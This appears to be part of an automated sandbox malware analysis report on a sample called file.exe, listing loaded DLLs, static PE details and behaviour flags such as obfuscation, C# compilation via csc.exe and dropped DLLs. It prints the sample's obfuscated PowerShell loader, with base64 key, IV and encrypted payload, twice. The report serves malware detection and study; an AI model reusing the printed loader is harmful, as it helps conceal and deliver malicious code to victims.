Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 11134263 > 1048576
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x550a00
Source: file.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x13f400
Source: file.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x135c00
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\source\repos\Increase\Increase\obj\Release\net8.0\win-x86\linked\Increase.pdbSHA256 source: file.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: file.exe
Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.pdb source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\source\repos\Increase\Increase\obj\Release\net8.0\win-x86\linked\Increase.pdb source: file.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: file.exe
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9 Jump to behavior
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline" Jump to behavior
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .CLR_UEF
Source: file.exe Static PE information: section name: .didat
Source: file.exe Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054454E1 push edi; ret 0_2_054454E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054454BD push edi; ret 0_2_054454C5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05440770 push esp; ret 0_2_05440771
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00BF41D0 push C370E50Ah; ret 1_2_00BF41E8
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
